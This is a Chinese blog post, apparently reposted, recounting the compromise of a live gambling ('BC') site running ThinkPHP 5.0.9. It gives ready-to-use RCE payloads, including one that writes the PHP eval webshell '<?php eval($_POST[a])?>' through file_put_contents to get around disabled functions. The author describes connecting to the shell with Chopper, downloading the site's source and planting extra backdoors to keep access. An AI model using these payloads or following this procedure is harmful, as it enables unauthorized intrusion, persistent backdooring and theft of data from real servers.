首页 /安全 / 渗透 / 正文

简单的BC站点getshell

2021-03-11| 发布者: xiaotiger| |来自: 互联网

最近来了点任务,做BC站,以前没做过只能碰碰运气! 确定目标 主站: 简单的BC站点getshell 通过旁站: 简单的BC站点getshell 信息收集 通过信息收集发现是个tp v5.0.9,此版本存在tp-rce漏洞。

最近来了点任务,做BC站,以前没做过只能碰碰运气!


确定目标

主站:

通过旁站:


信息收集

通过信息收集发现是个tp v5.0.9,此版本存在tp-rce漏洞。

直接通过payload进行测试,

Post:_method=__construct&filter[]=assert&method=get&get[]=phpinfo()

查找payload,直接打:

Post:_method=__construct&filter[]=assert&method=get&get[]=phpinfo()

发现是php 5.4.45版本的,

直接尝试getshell:

发现system被禁用,尝试其他系统命令的也一样。

查看phpinfo中desable_functions禁用了那些函数。

想办法怎么绕过进行写马(此处卡了我半天)

最后通过一位渗透小伙伴,想出下面的可以利用file_put_contents直接写shell,

想了半天,忘了用其他函数进行直接写马就可以了,并不需要非得利用system命令进行写马,还是底层知识薄弱啊。

再次感谢小伙伴!

getshell

构造payload:

_method=__construct&filter[]=assert&method=get&get[]=file_put_contents('a.php','<?php eval($_POST[a])?>')


写入成功,利用菜刀连接。

成功连接。


查看权限:

发现启动了远程安全模式。

想要绕过,发现很多函数被禁用,占未成功。

下载源码:

多部署一些后门,防止被删。

作者:Squirrels

转载自:https://xz.aliyun.com/t/9232

欢迎搜索我的公众号:小道黑客


Keywords: method 直接 函数 get construct 小伙伴 payload phpinfo 成功 assert

0人已打赏

0条评论 250人参与 网友评论 文明发言,请先登录注册

文明上网理性发言,请遵守国家法律法规。

最新评论

©2021 HACKBASE 黑名单手机版